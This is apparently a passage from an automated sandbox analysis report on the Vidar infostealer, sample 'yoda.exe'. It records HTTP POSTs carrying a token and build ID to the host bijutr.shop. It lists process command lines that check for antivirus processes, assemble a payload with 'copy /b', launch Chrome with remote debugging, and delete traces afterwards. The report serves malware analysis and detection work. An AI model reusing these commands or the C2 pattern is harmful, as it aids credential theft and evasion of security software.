                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Date: Fri, 27 Dec 2024 06:10:48 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              2024-12-27 06:10:49 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 2ok0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              38192.168.2.449898188.245.216.2054437592C:\Users\user\AppData\Local\Temp\314782\Iceland.com
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-27 06:10:50 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----QQI5XLXT00ZUAAASR90R
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                              Host: bijutr.shop
                                                                                                                                                                                                                                                              Content-Length: 453
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              2024-12-27 06:10:50 UTC453OUTData Raw: 2d 2d 2d 2d 2d 2d 51 51 49 35 58 4c 58 54 30 30 5a 55 41 41 41 53 52 39 30 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 36 65 66 65 39 65 36 66 35 62 37 33 34 30 36 35 64 32 39 64 37 65 33 36 61 65 32 37 34 66 33 0d 0a 2d 2d 2d 2d 2d 2d 51 51 49 35 58 4c 58 54 30 30 5a 55 41 41 41 53 52 39 30 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 38 38 36 33 65 66 63 35 39 38 38 30 61 36 33 37 32 66 39 37 36 35 62 36 37 62 65 61 64 63 33 0d 0a 2d 2d 2d 2d 2d 2d 51 51 49 35 58 4c 58 54 30 30 5a 55 41 41 41 53 52 39 30 52 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                              Data Ascii: ------QQI5XLXT00ZUAAASR90RContent-Disposition: form-data; name="token"d6efe9e6f5b734065d29d7e36ae274f3------QQI5XLXT00ZUAAASR90RContent-Disposition: form-data; name="build_id"b8863efc59880a6372f9765b67beadc3------QQI5XLXT00ZUAAASR90RCont
                                                                                                                                                                                                                                                              2024-12-27 06:10:50 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Date: Fri, 27 Dec 2024 06:10:50 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              2024-12-27 06:10:50 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 2ok0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              39192.168.2.449909188.245.216.2054437592C:\Users\user\AppData\Local\Temp\314782\Iceland.com
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-27 06:10:53 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----DBA1DBSRQQ9ZUASRIWLF
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                              Host: bijutr.shop
                                                                                                                                                                                                                                                              Content-Length: 331
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              2024-12-27 06:10:53 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 44 42 41 31 44 42 53 52 51 51 39 5a 55 41 53 52 49 57 4c 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 36 65 66 65 39 65 36 66 35 62 37 33 34 30 36 35 64 32 39 64 37 65 33 36 61 65 32 37 34 66 33 0d 0a 2d 2d 2d 2d 2d 2d 44 42 41 31 44 42 53 52 51 51 39 5a 55 41 53 52 49 57 4c 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 38 38 36 33 65 66 63 35 39 38 38 30 61 36 33 37 32 66 39 37 36 35 62 36 37 62 65 61 64 63 33 0d 0a 2d 2d 2d 2d 2d 2d 44 42 41 31 44 42 53 52 51 51 39 5a 55 41 53 52 49 57 4c 46 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                              Data Ascii: ------DBA1DBSRQQ9ZUASRIWLFContent-Disposition: form-data; name="token"d6efe9e6f5b734065d29d7e36ae274f3------DBA1DBSRQQ9ZUASRIWLFContent-Disposition: form-data; name="build_id"b8863efc59880a6372f9765b67beadc3------DBA1DBSRQQ9ZUASRIWLFCont
                                                                                                                                                                                                                                                              2024-12-27 06:10:54 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Date: Fri, 27 Dec 2024 06:10:53 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              2024-12-27 06:10:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              40192.168.2.449915188.245.216.2054437592C:\Users\user\AppData\Local\Temp\314782\Iceland.com
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-27 06:10:55 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----79HDJ5FK6F37QQIECBS0
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                              Host: bijutr.shop
                                                                                                                                                                                                                                                              Content-Length: 331
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              2024-12-27 06:10:55 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 37 39 48 44 4a 35 46 4b 36 46 33 37 51 51 49 45 43 42 53 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 36 65 66 65 39 65 36 66 35 62 37 33 34 30 36 35 64 32 39 64 37 65 33 36 61 65 32 37 34 66 33 0d 0a 2d 2d 2d 2d 2d 2d 37 39 48 44 4a 35 46 4b 36 46 33 37 51 51 49 45 43 42 53 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 38 38 36 33 65 66 63 35 39 38 38 30 61 36 33 37 32 66 39 37 36 35 62 36 37 62 65 61 64 63 33 0d 0a 2d 2d 2d 2d 2d 2d 37 39 48 44 4a 35 46 4b 36 46 33 37 51 51 49 45 43 42 53 30 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                              Data Ascii: ------79HDJ5FK6F37QQIECBS0Content-Disposition: form-data; name="token"d6efe9e6f5b734065d29d7e36ae274f3------79HDJ5FK6F37QQIECBS0Content-Disposition: form-data; name="build_id"b8863efc59880a6372f9765b67beadc3------79HDJ5FK6F37QQIECBS0Cont
                                                                                                                                                                                                                                                              2024-12-27 06:10:56 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Date: Fri, 27 Dec 2024 06:10:56 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              2024-12-27 06:10:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Statistics

                                                                                                                                                                                                                                                              CPU Usage

                                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                                              Memory Usage

                                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                                              High Level Behavior Distribution

                                                                                                                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                                                                                                                              Behavior

                                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                                              System Behavior

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Target ID:0
                                                                                                                                                                                                                                                              Start time:01:09:05
                                                                                                                                                                                                                                                              Start date:27/12/2024
                                                                                                                                                                                                                                                              Path:C:\Users\user\Desktop\yoda.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\yoda.exe"
                                                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                                                              File size:853'528 bytes
                                                                                                                                                                                                                                                              MD5 hash:79884836C406AE143BC31AEADFA81E70
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Target ID:1
                                                                                                                                                                                                                                                              Start time:01:09:06
                                                                                                                                                                                                                                                              Start date:27/12/2024
                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:"C:\Windows\System32\cmd.exe" /c copy Throat Throat.cmd & Throat.cmd
                                                                                                                                                                                                                                                              Imagebase:0x240000
                                                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Target ID:2
                                                                                                                                                                                                                                                              Start time:01:09:06
                                                                                                                                                                                                                                                              Start date:27/12/2024
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Target ID:3
                                                                                                                                                                                                                                                              Start time:01:09:08
                                                                                                                                                                                                                                                              Start date:27/12/2024
                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:tasklist
                                                                                                                                                                                                                                                              Imagebase:0x6c0000
                                                                                                                                                                                                                                                              File size:79'360 bytes
                                                                                                                                                                                                                                                              MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Target ID:4
                                                                                                                                                                                                                                                              Start time:01:09:08
                                                                                                                                                                                                                                                              Start date:27/12/2024
                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:findstr /I "opssvc wrsa"
                                                                                                                                                                                                                                                              Imagebase:0x6c0000
                                                                                                                                                                                                                                                              File size:29'696 bytes
                                                                                                                                                                                                                                                              MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Target ID:5
                                                                                                                                                                                                                                                              Start time:01:09:08
                                                                                                                                                                                                                                                              Start date:27/12/2024
                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:tasklist
                                                                                                                                                                                                                                                              Imagebase:0x6c0000
                                                                                                                                                                                                                                                              File size:79'360 bytes
                                                                                                                                                                                                                                                              MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Target ID:6
                                                                                                                                                                                                                                                              Start time:01:09:08
                                                                                                                                                                                                                                                              Start date:27/12/2024
                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                                                                                                                                                                                                                                              Imagebase:0x6c0000
                                                                                                                                                                                                                                                              File size:29'696 bytes
                                                                                                                                                                                                                                                              MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Target ID:7
                                                                                                                                                                                                                                                              Start time:01:09:09
                                                                                                                                                                                                                                                              Start date:27/12/2024
                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:cmd /c md 314782
                                                                                                                                                                                                                                                              Imagebase:0x240000
                                                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Target ID:8
                                                                                                                                                                                                                                                              Start time:01:09:09
                                                                                                                                                                                                                                                              Start date:27/12/2024
                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:findstr /V "INSPIRED" Interview
                                                                                                                                                                                                                                                              Imagebase:0x6c0000
                                                                                                                                                                                                                                                              File size:29'696 bytes
                                                                                                                                                                                                                                                              MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Target ID:9
                                                                                                                                                                                                                                                              Start time:01:09:09
                                                                                                                                                                                                                                                              Start date:27/12/2024
                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:cmd /c copy /b ..\Qualifications + ..\Iso + ..\Processor + ..\Luther A
                                                                                                                                                                                                                                                              Imagebase:0x240000
                                                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Target ID:10
                                                                                                                                                                                                                                                              Start time:01:09:09
                                                                                                                                                                                                                                                              Start date:27/12/2024
                                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\314782\Iceland.com
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:Iceland.com A
                                                                                                                                                                                                                                                              Imagebase:0xa20000
                                                                                                                                                                                                                                                              File size:947'288 bytes
                                                                                                                                                                                                                                                              MD5 hash:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                              • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000A.00000003.1950389528.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                              • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000A.00000002.2871233735.0000000003971000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                              • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000A.00000002.2868559733.0000000000ED3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                              • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000A.00000003.1950013637.0000000003795000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                              • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000A.00000003.1949965283.0000000000E48000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                              • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000A.00000002.2869693488.0000000003770000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                              • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000A.00000003.1950144358.0000000003974000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.2871233735.0000000003A4D000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                                                                                              • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Target ID:11
                                                                                                                                                                                                                                                              Start time:01:09:09
                                                                                                                                                                                                                                                              Start date:27/12/2024
                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\choice.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:choice /d y /t 5
                                                                                                                                                                                                                                                              Imagebase:0x900000
                                                                                                                                                                                                                                                              File size:28'160 bytes
                                                                                                                                                                                                                                                              MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Target ID:15
                                                                                                                                                                                                                                                              Start time:01:09:41
                                                                                                                                                                                                                                                              Start date:27/12/2024
                                                                                                                                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                                                                                                                                              Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                              File size:3'242'272 bytes
                                                                                                                                                                                                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Target ID:17
                                                                                                                                                                                                                                                              Start time:01:09:42
                                                                                                                                                                                                                                                              Start date:27/12/2024
                                                                                                                                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2588 --field-trial-handle=2176,i,7491124011227582456,6124971309095306324,262144 /prefetch:8
                                                                                                                                                                                                                                                              Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                              File size:3'242'272 bytes
                                                                                                                                                                                                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Target ID:19
                                                                                                                                                                                                                                                              Start time:01:10:56
                                                                                                                                                                                                                                                              Start date:27/12/2024
                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\314782\Iceland.com" & rd /s /q "C:\ProgramData\4EK6XL68GLNY" & exit
                                                                                                                                                                                                                                                              Imagebase:0x240000
                                                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Target ID:20
                                                                                                                                                                                                                                                              Start time:01:10:56
                                                                                                                                                                                                                                                              Start date:27/12/2024
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              Target ID:21
                                                                                                                                                                                                                                                              Start time:01:10:56
                                                                                                                                                                                                                                                              Start date:27/12/2024
                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:timeout /t 10
                                                                                                                                                                                                                                                              Imagebase:0x120000
                                                                                                                                                                                                                                                              File size:25'088 bytes
                                                                                                                                                                                                                                                              MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Disassembly

                                                                                                                                                                                                                                                              Reset < >

                                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                                Execution Coverage:17.5%
                                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                Signature Coverage:21%
                                                                                                                                                                                                                                                                Total number of Nodes:1482
                                                                                                                                                                                                                                                                Total number of Limit Nodes:25
